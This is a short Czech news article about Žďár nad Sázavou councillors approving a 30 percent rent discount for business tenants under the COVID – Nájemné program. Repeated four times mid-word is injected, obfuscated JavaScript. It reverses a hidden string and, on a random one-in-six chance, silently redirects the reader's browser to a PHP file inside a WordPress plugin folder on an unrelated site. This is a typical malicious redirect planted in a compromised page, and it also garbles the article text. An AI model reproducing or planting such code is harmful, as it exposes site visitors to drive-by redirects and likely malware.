Rainbow page separator

Žďárští radní schválili slevu na nájemném podnikatelům

Neděle, 26. července 2020

Žďár nad Sázavou / Žďárští radní schválili ve snaze pomoci zmírnit důsledky opatření přijatých v souvislosti s virem Covid 19 nájemcům pros["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tor sloužících k podnikání připojení se k programu COVID – Nájemné a slevu nájemného ve výši 30 procent. Jde o ty nájemce, kteří o slevu požádají a splní podmínky výše uvedeného programu. V protinávrhu stálo padesátiprocentní snížení nájemného, což ale přes žďárskou radu neprošlo. Radní Žďáru současně pověřili starostu uzavřením dodatků ke smlouvám, u nichž bude nájemné sníženo, a taktéž vydáním čestných prohlášení, které budou nájemci pros["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tor dokládat k žádosti o podporu v rámci programu COVID – Nájemné. Schválená sleva se týká taktéž příspěvkových organizací města s tím, že dodatky a čestné prohlášení zajistí ředitelé jednotlivých organizací.